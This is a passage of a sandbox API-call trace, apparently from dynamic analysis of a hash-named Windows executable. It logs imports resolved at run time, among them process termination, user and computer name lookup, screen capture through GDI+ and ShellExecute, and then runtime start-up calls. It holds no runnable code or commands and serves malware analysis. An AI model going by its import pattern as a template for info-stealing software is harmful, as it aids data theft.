0x74676920 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="GetDriveTypeA") returned 0x74676a00 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="GetLogicalDriveStringsA") returned 0x7468e790 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="DeleteFileA") returned 0x746768b0 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentProcessId") returned 0x746623e0 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="SetCurrentDirectoryA") returned 0x74692290 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="CopyFileW") returned 0x74676ec0 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="CloseHandle") returned 0x74676630 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="WriteFile") returned 0x74676ca0 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileA") returned 0x74676880 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="MultiByteToWideChar") returned 0x74662ad0 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="ReadFile") returned 0x74676bb0 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="GetFileSize") returned 0x74676a70 [0079.248] GetProcAddress (hModule=0x74650000, lpProcName="GetVersionExA") returned 0x7466a700 [0079.249] GetProcAddress (hModule=0x74650000, lpProcName="GetFileSizeEx") returned 0x74676a80 [0079.249] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentDirectoryA") returned 0x74690dc0 [0079.249] GetProcAddress (hModule=0x74650000, lpProcName="GetPrivateProfileSectionNamesA") returned 0x7468a4e0 [0079.249] GetProcAddress (hModule=0x74650000, lpProcName="Process32Next") returned 0x7466d1c0 [0079.249] GetProcAddress (hModule=0x74650000, lpProcName="Process32First") returned 0x7466f4d0 [0079.249] GetProcAddress (hModule=0x74650000, lpProcName="CreateToolhelp32Snapshot") returned 0x74677b50 [0079.249] GetProcAddress (hModule=0x74650000, lpProcName="TerminateProcess") returned 0x74675100 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="OpenProcess") returned 0x74668bf0 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="GetProcAddress") returned 0x746678b0 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="LoadLibraryA") returned 0x74674bf0 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="FreeLibrary") returned 0x74669f50 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="GetFileAttributesA") returned 0x74676a20 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="FileTimeToSystemTime") returned 0x74676d00 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="InterlockedCompareExchange") returned 0x74673ff0 [0079.250] GetProcAddress (hModule=0x74650000, lpProcName="OutputDebugStringW") returned 0x746919a0 [0079.251] GetProcAddress (hModule=0x74650000, lpProcName="OutputDebugStringA") returned 0x7466fde0 [0079.251] GetProcAddress (hModule=0x74650000, lpProcName="WaitForSingleObjectEx") returned 0x74676830 [0079.251] GetProcAddress (hModule=0x74650000, lpProcName="WaitForSingleObject") returned 0x74676820 [0079.251] GetProcAddress (hModule=0x74650000, lpProcName="UnmapViewOfFile") returned 0x74669b20 [0079.251] GetProcAddress (hModule=0x74650000, lpProcName="UnlockFileEx") returned 0x74676c90 [0079.251] GetProcAddress (hModule=0x74650000, lpProcName="UnlockFile") returned 0x74676c80 [0079.251] GetProcAddress (hModule=0x74650000, lpProcName="SystemTimeToFileTime") returned 0x74674c10 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="SetFilePointer") returned 0x74676c40 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="SetEndOfFile") returned 0x74676c00 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="QueryPerformanceCounter") returned 0x746638a0 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="MapViewOfFile") returned 0x74668d60 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="LockFileEx") returned 0x74676b90 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="LockFile") returned 0x74676b80 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="LoadLibraryW") returned 0x7466a840 [0079.252] GetProcAddress (hModule=0x74650000, lpProcName="HeapCompact") returned 0x746912a0 [0079.253] GetProcAddress (hModule=0x74650000, lpProcName="HeapValidate") returned 0x7466cf80 [0079.253] GetProcAddress (hModule=0x74650000, lpProcName="HeapSize") returned 0x7791bb20 [0079.253] GetProcAddress (hModule=0x74650000, lpProcName="HeapReAlloc") returned 0x7791efe0 [0079.253] GetProcAddress (hModule=0x74650000, lpProcName="HeapDestroy") returned 0x74674c30 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="HeapCreate") returned 0x7466a100 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="GetVersionExW") returned 0x7466aa80 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="LocalAlloc") returned 0x74667a30 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="GetTempPathW") returned 0x74676b30 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="GetTempPathA") returned 0x74676b20 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="GetSystemTimeAsFileTime") returned 0x74667620 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="GetSystemTime") returned 0x74674940 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="GetSystemInfo") returned 0x7466a0f0 [0079.256] GetProcAddress (hModule=0x74650000, lpProcName="GetLastError") returned 0x74663870 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="GetFullPathNameW") returned 0x74676ae0 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="GetFullPathNameA") returned 0x74676ad0 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="GetFileAttributesExW") returned 0x74676a40 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="GetFileAttributesW") returned 0x74676a50 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="GetDiskFreeSpaceW") returned 0x746769f0 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="GetDiskFreeSpaceA") returned 0x746769c0 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="FormatMessageW") returned 0x74674f80 [0079.257] GetProcAddress (hModule=0x74650000, lpProcName="FormatMessageA") returned 0x7466f830 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="FlushFileBuffers") returned 0x746769b0 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="CreateMutexW") returned 0x746766f0 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileMappingW") returned 0x746699b0 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileMappingA") returned 0x746679c0 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileW") returned 0x74676890 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="AreFileApisANSI") returned 0x7466f300 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="DeleteCriticalSection") returned 0x77940e60 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="EnterCriticalSection") returned 0x7792f290 [0079.258] GetProcAddress (hModule=0x74650000, lpProcName="LeaveCriticalSection") returned 0x7792f210 [0079.259] GetProcAddress (hModule=0x74650000, lpProcName="InitializeCriticalSection") returned 0x7794a200 [0079.259] GetProcAddress (hModule=0x74650000, lpProcName="TryEnterCriticalSection") returned 0x77949190 [0079.259] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentThreadId") returned 0x74661b90 [0079.259] GetProcAddress (hModule=0x74650000, lpProcName="GetComputerNameA") returned 0x7466fbf0 [0079.259] GetProcAddress (hModule=0x74650000, lpProcName="IsWow64Process") returned 0x74669f10 [0079.259] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentProcess") returned 0x746638c0 [0079.259] GetProcAddress (hModule=0x74650000, lpProcName="GlobalMemoryStatus") returned 0x74668e00 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleHandleA") returned 0x746699f0 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="GetUserDefaultLocaleName") returned 0x7466ad60 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="TzSpecificLocalTimeToSystemTime") returned 0x74692650 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="GetTimeZoneInformation") returned 0x7466acc0 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="GetLocaleInfoA") returned 0x7466e7b0 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="GetFileInformationByHandle") returned 0x74676a60 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="GetLocalTime") returned 0x74669be0 [0079.260] GetProcAddress (hModule=0x74650000, lpProcName="CompareStringW") returned 0x74672630 [0079.261] GetProcAddress (hModule=0x74650000, lpProcName="SetStdHandle") returned 0x74692430 [0079.261] GetProcAddress (hModule=0x74650000, lpProcName="WideCharToMultiByte") returned 0x74663880 [0079.261] GetProcAddress (hModule=0x74650000, lpProcName="Sleep") returned 0x74667990 [0079.261] GetProcAddress (hModule=0x74650000, lpProcName="IsValidLocale") returned 0x7466ab40 [0079.261] GetProcAddress (hModule=0x74650000, lpProcName="EnumSystemLocalesA") returned 0x74690b70 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="GetUserDefaultLCID") returned 0x74672920 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="GetLocaleInfoW") returned 0x7466cd70 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="GetStringTypeW") returned 0x74667950 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="GetEnvironmentStringsW") returned 0x7466aac0 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="FreeEnvironmentStringsW") returned 0x7466a7e0 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleFileNameA") returned 0x7466a720 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="GetConsoleMode") returned 0x74676f70 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="GetConsoleCP") returned 0x74676f60 [0079.262] GetProcAddress (hModule=0x74650000, lpProcName="SetEnvironmentVariableA") returned 0x746922f0 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="SetEnvironmentVariableW") returned 0x7466e9e0 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleFileNameW") returned 0x74669b00 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="IsValidCodePage") returned 0x7466a790 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="GetOEMCP") returned 0x74675140 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="GetACP") returned 0x74668500 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="GetFileType") returned 0x74676aa0 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74676730 [0079.263] GetProcAddress (hModule=0x74650000, lpProcName="GetStdHandle") returned 0x7466a6e0 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="SetHandleCount") returned 0x746750e0 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="SetLastError") returned 0x74662af0 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="TlsFree") returned 0x7466a040 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="TlsSetValue") returned 0x746629d0 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="TlsGetValue") returned 0x74661b70 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="GetTickCount") returned 0x74675eb0 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="ExitProcess") returned 0x74677b30 [0079.264] GetProcAddress (hModule=0x74650000, lpProcName="InterlockedIncrement") returned 0x74672a00 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="InterlockedDecrement") returned 0x74672a20 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="InterlockedExchange") returned 0x74667870 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="DecodePointer") returned 0x7794d830 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="RaiseException") returned 0x74668c20 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="RtlUnwind") returned 0x74668c10 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="ExitThread") returned 0x77957a80 [0079.265] GetProcAddress (hModule=0x74650000, lpProcName="CreateThread") returned 0x74669b90 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="GetCommandLineA") returned 0x7466ab60 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="HeapSetInformation") returned 0x7466a8e0 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="GetStartupInfoW") returned 0x7466a740 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="LCMapStringW") returned 0x74669f30 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="GetCPInfo") returned 0x7466a290 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="UnhandledExceptionFilter") returned 0x74692670 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="SetUnhandledExceptionFilter") returned 0x7466a940 [0079.266] GetProcAddress (hModule=0x74650000, lpProcName="IsDebuggerPresent") returned 0x7466b0b0 [0079.267] GetProcAddress (hModule=0x74650000, lpProcName="IsProcessorFeaturePresent") returned 0x74669bf0 [0079.267] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleHandleW") returned 0x74669bc0 [0079.267] GetProcAddress (hModule=0x74650000, lpProcName="TlsAlloc") returned 0x7466a120 [0079.267] GetProcAddress (hModule=0x74650000, lpProcName="WriteConsoleW") returned 0x74677020 [0079.267] LoadLibraryExA (lpLibFileName="USER32.dll", hFile=0x0, dwFlags=0x0) returned 0x74790000 [0079.267] GetProcAddress (hModule=0x74790000, lpProcName="GetDesktopWindow") returned 0x747a3470 [0079.267] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77820000 [0079.267] GetProcAddress (hModule=0x77820000, lpProcName="GetUserNameA") returned 0x77842910 [0079.268] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76370000 [0079.268] GetProcAddress (hModule=0x76370000, lpProcName="SHFileOperationA") returned 0x765cf680 [0079.268] GetProcAddress (hModule=0x76370000, lpProcName="ShellExecuteA") returned 0x765e0210 [0079.268] GetProcAddress (hModule=0x76370000, lpProcName="SHGetFolderPathA") returned 0x76529b10 [0079.268] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x75790000 [0079.268] GetProcAddress (hModule=0x75790000, lpProcName="PathMatchSpecW") returned 0x757b2c80 [0079.268] GetProcAddress (hModule=0x75790000, lpProcName="PathMatchSpecA") returned 0x757b2c20 [0079.268] LoadLibraryExA (lpLibFileName="PSAPI.DLL", hFile=0x0, dwFlags=0x0) returned 0x75670000 [0079.349] GetProcAddress (hModule=0x75670000, lpProcName="GetModuleFileNameExA") returned 0x75671660 [0079.349] GetProcAddress (hModule=0x75670000, lpProcName="GetModuleBaseNameA") returned 0x75671640 [0079.349] GetProcAddress (hModule=0x75670000, lpProcName="EnumProcessModules") returned 0x75671360 [0079.349] LoadLibraryExA (lpLibFileName="WININET.dll", hFile=0x0, dwFlags=0x0) returned 0x70830000 [0079.908] GetProcAddress (hModule=0x70830000, lpProcName="DeleteUrlCacheEntry") returned 0x708f2080 [0079.908] LoadLibraryExA (lpLibFileName="gdiplus.dll", hFile=0x0, dwFlags=0x0) returned 0x6c380000 [0080.749] GetProcAddress (hModule=0x6c380000, lpProcName="GdipGetImageEncodersSize") returned 0x6c3df520 [0080.749] GetProcAddress (hModule=0x6c380000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x6c3c5b70 [0080.750] GetProcAddress (hModule=0x6c380000, lpProcName="GdipSaveImageToFile") returned 0x6c3e1e90 [0080.750] GetProcAddress (hModule=0x6c380000, lpProcName="GdipCloneImage") returned 0x6c3e2890 [0080.750] GetProcAddress (hModule=0x6c380000, lpProcName="GdipGetImageEncoders") returned 0x6c3df380 [0080.750] GetProcAddress (hModule=0x6c380000, lpProcName="GdiplusShutdown") returned 0x6c3ea7c0 [0080.750] GetProcAddress (hModule=0x6c380000, lpProcName="GdipFree") returned 0x6c3c3810 [0080.750] GetProcAddress (hModule=0x6c380000, lpProcName="GdipAlloc") returned 0x6c3c3840 [0080.750] GetProcAddress (hModule=0x6c380000, lpProcName="GdiplusStartup") returned 0x6c3eab50 [0080.751] GetProcAddress (hModule=0x6c380000, lpProcName="GdipDisposeImage") returned 0x6c3e91c0 [0080.751] VirtualProtect (in: lpAddress=0x401000, dwSize=0xb6d05, flNewProtect=0x2830178, lpflOldProtect=0x19f780 | out: lpflOldProtect=0x19f780*=0x2) returned 0 [0080.753] VirtualProtect (in: lpAddress=0x4b8000, dwSize=0x18340, flNewProtect=0x2830158, lpflOldProtect=0x19f780 | out: lpflOldProtect=0x19f780*=0x2) returned 0 [0080.753] VirtualProtect (in: lpAddress=0x4d1000, dwSize=0x5944, flNewProtect=0x2830160, lpflOldProtect=0x19f780 | out: lpflOldProtect=0x19f780*=0x2) returned 0 [0080.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb30 | out: lpSystemTimeAsFileTime=0x19fb30*(dwLowDateTime=0x243ee13b, dwHighDateTime=0x1d7b3bd)) [0080.886] GetCurrentProcessId () returned 0x5bc [0080.886] GetCurrentThreadId () returned 0xab0 [0080.886] GetTickCount () returned 0x1227eb3 [0080.886] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb28 | out: lpPerformanceCount=0x19fb28*=1914094599161) returned 1 [0080.895] GetStartupInfoW (in: lpStartupInfo=0x19fad4 | out: lpStartupInfo=0x19fad4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0080.895] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.901] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x29a0000 [0081.019] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0081.019] GetProcAddress (hModule=0x74650000, lpProcName="FlsAlloc") returned 0x7466a980 [0081.019] GetProcAddress (hModule=0x74650000, lpProcName="FlsGetValue") returned 0x74667570 [0081.019] GetProcAddress (hModule=0x74650000, lpProcName="FlsSetValue") returned 0x74669e30 [0081.020] GetProcAddress (hModule=0x74650000, lpProcName="FlsFree") returned 0x74674ff0 [0081.402] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x214) returned 0x29a05a8 [0081.403] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0081.411] GetCurrentThreadId () returned 0xab0 [0081.411] GetStartupInfoW (in: lpStartupInfo=0x19fa70 | out: lpStartupInfo=0x19fa70*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0081.411] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x800) returned 0x29a07c8 [0081.411] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0081.411] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0081.411] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0081.411] SetHandleCount (uNumber=0x20) returned 0x20 [0081.411] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " [0081.411] GetEnvironmentStringsW () returned 0x6efdb8* [0081.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0081.415] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50d) returned 0x29a0fd0 [0081.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x29a0fd0, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0081.518] FreeEnvironmentStringsW (penv=0x6efdb8) returned 1 [0081.518] GetLastError () returned 0x57 [0081.518] SetLastError (dwErrCode=0x57) [0081.518] GetLastError () returned 0x57 [0081.518] SetLastError (dwErrCode=0x57) [0081.523] GetLastError () returned 0x57 [0081.523] SetLastError (dwErrCode=0x57) [0081.523] GetACP () returned 0x4e4 [0081.523] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x220) returned 0x29a14e8 [0081.523] GetLastError () returned 0x57 [0081.523] SetLastError (dwErrCode=0x57) [0081.523] IsValidCodePage (CodePage=0x4e4) returned 1 [0081.523] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fa38 | out: lpCPInfo=0x19fa38) returned 1 [0081.536] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f504 | out: lpCPInfo=0x19f504) returned 1 [0081.536] GetLastError () returned 0x57 [0081.536] SetLastError (dwErrCode=0x57) [0081.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f918, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f918, cbMultiByte=256, lpWideCharStr=0x19f288, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.536] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x19f518 | out: lpCharType=0x19f518) returned 1 [0081.536] GetLastError () returned 0x57 [0081.536] SetLastError (dwErrCode=0x57) [0081.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f918, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f918, cbMultiByte=256, lpWideCharStr=0x19f248, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.536] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0081.536] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f038, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0081.536] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19f818, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 